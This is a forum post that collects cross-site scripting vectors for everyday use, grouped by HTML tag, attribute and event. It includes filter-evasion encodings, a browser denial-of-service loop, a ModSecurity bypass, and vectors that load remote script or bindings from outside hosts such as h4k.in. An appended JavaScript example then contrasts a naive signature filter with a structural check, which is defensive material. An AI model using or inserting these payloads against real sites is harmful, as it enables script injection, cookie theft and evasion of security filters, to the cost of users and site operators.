22.09.2012, 20:34   #1
RulleR
XSS Vectors Collection [for every day]

I would like to draw your attention to my collection of XSS vectors. I have been gathering it over the last 3 years from all over the internet.
As the saying goes, a vector from everyone makes a cardigan for an rdot member =). I think the thread will be useful to everyone and will not sink into oblivion.
Dear editors, I am eagerly awaiting your collections =).

Tags covered:
Code:
<a>, <applet>, <body>, <div>, <embed>, <form>, <frameset>, <h1>, <html>, <iframe>, <img>,
 <input>, <isindex>, <li>, <link>, <marquee>, <math>, <video>, <object>, <script>, <select>, <style>, <svg>,
 <xml>, <other tags>.
Attributes covered:
Code:
href, code, background, style, src, dynsrc, formaction, action, data, value.
Events covered:
Code:
onclick, ondblclick, onreadystatechange, onkeypress, onscroll, oninput, onmouseenter, 
 onmouseover, onmousemove, onfocus, onpageshow, onpagehide, onload, onunload, onbeforeunload, onsubmit, onreset,
 onforminput, onformchange, onblur, onmouseout, onmouseup, onmousedown, onmouseleave, onerror, onbegin, onselect,
 onstart, onchange.
=====================================================================================

Whitespaces
Code:
\x20 \x09 \x0A \x0B \x0C \x0D \xA0 /**/
Alert() function variations
Code:
alert('xss')
prompt('xss')
confirm('xss')
write('xss')

window.alert(1)
window['alert'](1) == window['al\u0065rt'](1)
top['alert'](1)
self['alert'](1)
parent['alert'](1)

µ = self ['\x61lert'], µ(1) 
location['href']= 'javascript:\u0061l'+ String.fromCharCode(101)+'rt(1)' 
top[<>alert</>](1) 
eval(unescape('%61')+/lert(1)/[-1])
Eval() function variations
Code:
eval()
execScript()
Function()
Script()
_FirebugConsole.evaluate()
Document.Cookie variations
Code:
alert(document.cookie)
alert(document['cookie'])
alert(this['doc'+'ument'].cookie)
with(document)alert(cookie)
Base64 morphs
Code:
atob('amF2YXNjcmlwdDphbGVydCgxKQ'); //FF only
btoa("\x7a\xf6\xa5"); //FF only
XSS Dos attack
Code:
<script>while(true){alert('xss_dos');}</script>

while(true)alert('xss_dos')
for(;;)alert('xss_dos')
window.open(window.location)
javascript:for(;;)open()
=====================================================================================

<A> variations
Code:
<a href="javascript:alert(1)">pew</a> //On click
<a href="pew" style="background-image: expression(alert(1))">
<a href=# onclick=alert(1)>test</a>
<a ondblclick=alert(1)>test</a> //On double click

<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">test</a>
</a style=""x:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')">
<APPLET> variations
Code:
<applet code="javascript:alert(1)">
<applet onreadystatechange=alert(1)> //Only IE
<BODY> variations
Code:
<body onkeypress=alert(1)> //Press any key
<body background="javascript:alert(1)">
<body onscroll=alert(1)><br><br><br>. . .<br><input autofocus> //HTML5
<body oninput=alert(1)><input autofocus> //HTML5

<body onmouseenter=alert(1)>
<body onmouseover=alert(1)>
<body onmousemove=alert(1)>

<body onfocus=alert(1)>
<body onpageshow=alert(1)>
<body onpagehide=alert(1)>
<body onunload=alert(1)>
<body onbeforeunload=alert(1)>

Attribute Onload:
<body class='>' onload=alert(); <span>test</body>
<img <body class=>src=xek> onload=1;>
<body alt"x onload=alert(1) y" src="mars.png">
<DIV> variations
Code:
<div style=x=expressio\n(alert(1))>
<div style="width: expression(alert(1));">test</div> 
<div/*\/style=!!!\*/-!!!=exp\r/*expr\*/essio\n(!!!alert(1))>
<div/style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>
<div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>
<div style=width:1px;filter:glow onfilterchange=alert(1)>test</div>

<div style=”behavior: url(“/file.htc”)
The contents of the included file are roughly as follows:
<attach event="ondocumentready" handler="parseStylesheets" />
<script language="JavaScript">
function parseStylesheets() {
alert(1)
}
</script>
<EMBED> variations
Code:
<embed src=javascript:alert(1);this.avi;this.wav>
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>
<FORM> variations
Code:
<form id="test" /><button form="test" formaction="javascript:alert(1)">test
<form><button formaction="javascript:alert(1)">test

<form onsubmit=alert(1)><input type=submit> //On click
<form onreset=alert(1)><input type=reset> //On click
<form id=test onforminput=alert(1)><input></form>
<button form=test onformchange=alert(1)>test

<form action="javascript:alert(1)"><input type=image src="pew"></form> //On click
<form action="javascript:alert(1)"><input type=submit> //On click
<form action="javascript:alert(1)"<input type=submit> //On click
<form action="javascript:alert(1)">test</form>
<FRAMESET> variations
Code:
<frameset><frame src="javascript:alert(1)"></frameset>
<frameset onload=alert(1)>
<frameset onblur=alert(1)>
<H1> variations
Code:
<h1 onclick=alert(1)>test</h1> //On click
<h1 onmouseover=alert(1) onmouseout=alert(2)>test</h1>
<HTML> variations
Code:
<html onmousedown=alert(1)>
<html onmouseout=alert(1)>
<html onmouseleave=alert(1)>
<html onmouseenter=alert(1)>
<IFRAME> variations
Code:
<iframe onload=alert(1)>
<iframe src="javascript:alert(1)">

<iframe onreadystatechange=alert(1)> //Only IE
<iframe onreadystatechange=alert(1)></iframe> //Only IE
<IMG> variations
Code:
<img onclick=alert(1)> //On click
<img onmousedown=alert(1) onmouseup=alert(2)> //On click
<img src=pew s='"p">'onerror=alert(1) style=visibility:hidden>
<img src="javascript:alert(1)"> 
<image src="javascript:alert(1)">
<img src=javascript:alert(1) dynsrc=javascript:alert(2)>
<img src="pew" onerror=alert(1)>
<img/src/onerror=alert(1)//>
<img/onerror=alert(1) src=x>
<img src="about:blank" onerror="alert(1);<!--
<img src="x:x" onerror="alert(1)">
<img src=x:alert(alt) onerror=eval(src) alt=1> 
<img src="x:? title=" onerror=alert(1)//">

<comment><img src="</comment><img src=x onerror=alert(1))//">
<style><img src="</style><img src=x onerror=alert(1)//">
<img src="x` `<script>alert(1)</script>"` `>
<br/<img/src=1 onerror=alert(1)> 

<!--<img src="--><img src=x onerror=alert(1)//">
<!-- `<img/src=x:x onerror=alert(1)//--!>
<!--[if]><script>alert(1)</script -->
<!--[if<img src=x onerror=alert(1)//]> -->

<![><img src="]><img src=x onerror=alert(1)//"> 
<svg><![CDATA[><image xlink:href="]]><img src=x:x onerror=alert(1)//"></svg>

<img style="behavior:\75\72\6C\28\23\64\65\66\61\75\6C\74\23\74\69\6D\65\32\29;display:none" onbegin="alert(1)"> //Only IE
<img src="pew" style="-mozbinding:url('http://myserver/xssmoz.xml#xss');" />

<img type=image src="pew" onreadystatechange=alert(1)> //Only IE
<image type=image src="pew" onreadystatechange=alert(1)> //Only IE

ModSecurity bypass

The filter will catch:
<img src="x:gif" onerror="alert(0)">

but miss:
<img src="x:alert" onerror="eval(src%2b'(0)')">
<img src="x:gif" onerror="eval('al'%2b'lert(0)')">
<img src="x:gif" onerror="window['al\u0065rt'](0)"></img>

VBScript

<img src=1 language=vbs onerror=msgbox+1>
<img src=1 language=vbscript onerror=msgbox+1>
<img src=1 onerror=vbs:msgbox+1>

<b/alt="1"onmouseover=InputBox+1 language=vbs>test</b>
<INPUT> variations
Code:
<input type="text" type="image" name="text" value="" src="pew" onerror="alert(1)" />
<input type=image src="javascript:alert(1)" dynsrc="javascript:alert(2)">
<input type=image src="pew" onreadystatechange=alert(1)> //Only IE
<input style=behavior:url(#default#time2) onbegin=alert(1)>
<input onmouseover=alert(1)>
<input value="pew" onselect=alert(1)> //Pick out

<input autofocus onfocus=alert(1)> //HTML5
<input onblur=alert(1)>
<input onblur=alert(1) autofocus> //HTML5
<ISINDEX> variations
Code:
<isindex type=image src=1 onerror=alert(1)>
<isindex action=javascript:alert(1) type=image> //On click
<isindex type=image src=1 onreadystatechange=alert(1)> //Only IE
<LI> variations
Code:
<li style=list-style:url() onerror=alert(1)></li> 
<body <li background="javascript:alert(1)"/>
<LINK> variations
Code:
<link rel=stylesheet href=data:,{x:expression(alert(1))}
<link onload=alert(1) href="http://hackvertor.co.uk/css/styles.css" rel="stylesheet"/>
<MARQUEE> variations
Code:
<marquee src=`" onscroll=alert(1)//`>
<marquee style="width: expression(alert(1));">foo</marquee>

<marquee onstart='alert(1)'>foo</marquee>
<marquee onstart=alert(1)>foo</marquee>
<marquee onstart=`alert(1)`>foo</marquee>

<marquee id=m foo=al bar=ert onerror=top[m.foo+m.bar](1)>foo</marquee>
<marquee onstart="var x='al'; var y='er'; self[x+y](1)">foo</marquee>
<marquee onstart=`var x=alert; x(1)`>foo</marquee>
<marquee onstart=`location=javascript:alert(1)`>foo</marquee>
<marquee onstart="location.replace('javascript:alert(1)')">foo</marquee>
<marquee c=:al id=m b=ript a=javasc d=ert e=(1) f=replace onstart=location[m.f](m.a+m.b+m.c+m.d+m.e)>foo</marquee>

<marquee onstart=`MsgBox 1` language=vbscript>foo</marquee>
<marquee onstart=`vbscript:MsgBox 1`>foo</marquee>

<marquee onstart=`var x =String; top[x.fromCharCode(97,108,101,114,116)](1);`>foo</marquee>
<marquee onstart=`var y=location; var z=y.hash.substring(1,200);top.location=z`>foo</marquee>
<MATH> variations
Code:
<math href="javascript:alert(1)">CLICKME</math>
<math><maction actiontype="statusline#http://Blueinfy.com" xlink:href="javascript:alert(1)">CLICKME</maction></math>
<VIDEO> variations
Code:
<video><source onerror="javascript:alert(1)"> //HTML5
<video onerror="javascript:alert(1)"><source> //HTML5
<video onerror="javascript:alert(1)"><source></source></video> //HTML5
<video src=1 onerror=alert(1)> //HTML5
<OBJECT> variations
Code:
<object data="javascript:alert(1)">
<object src=1 onerror=alert(1)>
<object classid=x><param name=url value=javascript:alert(1)></object>
<object><param name="src" value=javascript:alert(1)></object>
<object type=image src="pew" onreadystatechange=alert(1)></object> //Only IE
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
<P> variations
Code:
<p style="width: expression(alert(1));">test</p>
<p style=xss:\65\78\70\72\65\73\73\69\6f\6e(alert(1))>
<p style="behavior:url('#default#time2')" onend="alert(1)">
<p style="b\eh\a\v\i\o\r:url('#default#time2')" onend="alert(1)">
<p style=list-style-image:url(javascript:alert(1))>

//IE VB Messagebox injection
<p style=list-style-image:url(vbscript:Execute(MsgBox(chr(88)&chr(83)&chr(83))))>
<SCRIPT> variations
Code:
<script src=1 onerror=alert(1)></script>
<script onreadystatechange=alert(1)> //Only IE
<script onreadystatechange=alert(1)></script> //Only IE
<script for=document event=onreadystatechange>alert(1)</script>
<script src="javascript:alert(1)"></script>
<b <script>alert(1)//</script>0</script></b>
<b "<script>alert(1)</script>">test</b>
<script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>
<script>({0:#0=alert/#0#/#0#(1)})</script>

<script>
new Function();
Function('a\x6cert(1)')();
</script>

<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1);</x:script>
<xss xmlns:x="http://www.w3.org/1999/xhtml"><x:script>alert(1);</x:script></xss>
<SELECT> variations
Code:
<select autofocus onfocus=alert(1)> //HTML5
<select onchange="javascript:alert(1)"><option><option></select> //On change
<STYLE> variations
Code:
<style>{x=expression(alert(1))}</style>
<style>@\import "data:,{x:expression(alert(1))}";</style> 
<style>body{-moz-binding:url("http://www.ush.it/path/to/evil#xss")}</style>

<style onreadystatechange=alert(1)> //Only IE
<style onreadystatechange=alert(1)></style> //Only IE

<style>*{x=expression\28write\28 1\29\29}</style>
<style>@\import "data:,*%7bx:expression%28write%281%29%29%7D";</style>
<SVG> variations
Code:
<svg onload="javascript:alert(1)">
<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg>
<XML> variations
Code:
<xml onreadystatechange=alert(1)> //Only IE
<xml onreadystatechange=alert(1)>test</xml> //Only IE
<OTHER tags> variations
Code:
<audio src=1 onerror=alert(1)> //HTML5

<base href='javascript:'><img src=`alert(1)`>

<button onclick=alert(1)>test</button> //On click

<bgsound src="javascript:alert(1)"/>

<keygen autofocus onfocus=alert(1)> //HTML5

<?xml-stylesheet href="javascript:alert(1)"?><root/>

<table background=javascript:alert(1)>

<table background=javascript:alert(1)>

<textarea autofocus onfocus=alert(1)> //HTML5

<td>pew</td style="x:expression(alert(1))">

<th>wep</th style="x:expression(alert(1))">

<var onmouseover=alert(1)>test</var>

<xss style="behavior: url(xss.htc);">
<xss style="background-position-x:expression\0028\0065\0076\0061\006C\0028\0061\006C\0065\0072\0074\0028\0027pwn3d\0027\0029\0029\0029
<xss style=&#x5c2d&#x5c6d&#x5c6f&#x5c7a&#x5c2d&#x5c62&#x5c69&#x5c6e&#x5c64&#x5c69&#x5c6e&#x5c67:url(\2f\2f\62\75\73\69\6e\65\73\73\69\6e\66\6f\2e\63\6f\2e\75\6b\2f\6c\61\62\73\2f\78\62\6c\2f\78\62\6c\2e\78\6d\6c\23\78\73\73)>

" sstyle="foobar"tstyle="foobar"ystyle="foobar"lstyle="foobar"estyle="foobar"=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar</b>#xss)" a="
" sXtXyXlXeX=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar</b>#xss)" a="
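Added example, not part of RulleR's post: a small JavaScript comparison of the literal "alert(" signature described in the ModSecurity bypass note against a structural policy that never reads the payload and only asks where script could run (event-handler attributes, script-scheme URLs after entity and whitespace normalization, active CSS such as expression(), behavior: and -moz-binding). The tag/attribute parser, the helper names and the one sample marked "constructed" are assumptions made for this demo; the other samples are vectors from the post.

```javascript
const TAG_RE = /<([a-z][\w:-]*)([^>]*)>/gi;
const ATTR_RE = /([^\s=\/"'`>]+)\s*(?:=\s*("[^"]*"|'[^']*'|`[^`]*`|[^\s>]*))?/g;
const URL_ATTRS = new Set(["href", "src", "action", "formaction", "data",
                           "background", "dynsrc", "code", "xlink:href"]);

// Naive signature filter of the kind the ModSecurity note describes: it looks
// for the literal function name and nothing else.
function naiveFilter(html) {
  return /alert\s*\(/i.test(html);
}

// Undo the cheap tricks that hide a URL scheme or CSS keyword: numeric entities,
// percent-encoding and embedded whitespace/control bytes (see "Whitespaces").
// CSS "\hh" and JS "\xhh" escapes are left alone: the policy never reads the payload.
function normalizeValue(raw) {
  let v = raw.replace(/^["'`]|["'`]$/g, "")
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => String.fromCharCode(Number(d)));
  try { v = decodeURIComponent(v); } catch (e) { /* not percent-encoded */ }
  return v.replace(/[\x00-\x20\xa0]+/g, "").toLowerCase();
}

// Structural policy: returns a reason for the first attribute that lets script
// run, or null. "/" is not a name character, so "<img/src/onerror=...>" still
// parses. Deliberately small parser; a real sanitizer needs a real HTML parser.
function structuralCheck(html) {
  for (const tag of html.matchAll(TAG_RE)) {
    for (const attr of tag[2].matchAll(ATTR_RE)) {
      const name = attr[1].toLowerCase();
      const value = attr[2] === undefined ? "" : normalizeValue(attr[2]);
      if (name.startsWith("on")) return `event handler ${name} on <${tag[1]}>`;
      if (URL_ATTRS.has(name) && /^(javascript|vbscript|vbs|data):/.test(value))
        return `script-scheme url in ${name} on <${tag[1]}>`;
      if (name === "style" && /expression\(|behavior:|-moz-binding:/.test(value))
        return `active css in style on <${tag[1]}>`;
    }
  }
  return null;
}

// Vectors from the post, one constructed scheme obfuscation and one benign control.
const SAMPLES = [
  '<img src="x:gif" onerror="alert(0)">',
  '<img src="x:alert" onerror="eval(src%2b\'(0)\')">',
  '<marquee onstart=`var x=alert; x(1)`>foo</marquee>',
  '<a href="java&#x09;script:top[\'al\'+\'ert\'](1)">x</a>',           // constructed
  '<a href="https://example.com" title="alert(1) is a string">x</a>', // benign
];
for (const s of SAMPLES) console.log(naiveFilter(s), structuralCheck(s), s);
```

The signature filter misses three of the four hostile samples and flags the benign one; the structural policy gets all five right because it judges the attribute, not the payload.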